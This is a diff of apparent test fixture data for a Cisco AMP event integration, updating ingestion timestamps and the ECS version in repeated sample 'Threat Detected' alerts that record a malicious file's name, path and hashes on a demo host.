@@ -117,7 +117,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581713543Z", + "ingested": "2021-09-13T18:06:53.271892093Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":381000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196255\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -174,7 +174,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -200,7 +200,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581715796Z", + "ingested": "2021-09-13T18:06:53.271894245Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":365000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196254\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -257,7 +257,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -283,7 +283,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581730632Z", + "ingested": "2021-09-13T18:06:53.271896176Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":350000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196253\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -340,7 +340,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -366,7 +366,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581733039Z", + "ingested": "2021-09-13T18:06:53.271898088Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":334000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196252\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -423,7 +423,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -449,7 +449,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581734917Z", + "ingested": "2021-09-13T18:06:53.271900010Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":318000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196251\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -506,7 +506,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -532,7 +532,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581736759Z", + "ingested": "2021-09-13T18:06:53.271901953Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":318000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196250\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -589,7 +589,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -615,7 +615,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581738562Z", + "ingested": "2021-09-13T18:06:53.271903942Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":303000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196249\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -672,7 +672,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -698,7 +698,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581740367Z", + "ingested": "2021-09-13T18:06:53.271905830Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":287000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196248\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -755,7 +755,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -781,7 +781,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581742294Z", + "ingested": "2021-09-13T18:06:53.271907735Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":256000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196247\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -838,7 +838,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -864,7 +864,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581744207Z", + "ingested": "2021-09-13T18:06:53.271909623Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":225000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196246\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -921,7 +921,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -947,7 +947,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581746351Z", + "ingested": "2021-09-13T18:06:53.271911811Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":225000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196245\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -1004,7 +1004,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -1030,7 +1030,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581748237Z", + "ingested": "2021-09-13T18:06:53.271913736Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":209000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196244\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -1087,7 +1087,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -1113,7 +1113,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581750120Z", + "ingested": "2021-09-13T18:06:53.271915654Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":178000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196243\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -1170,7 +1170,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -1196,7 +1196,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581752005Z", + "ingested": "2021-09-13T18:06:53.271917544Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":147000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196242\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -1253,7 +1253,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -1279,7 +1279,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581753905Z", + "ingested": "2021-09-13T18:06:53.271919448Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":69000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196241\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166ddd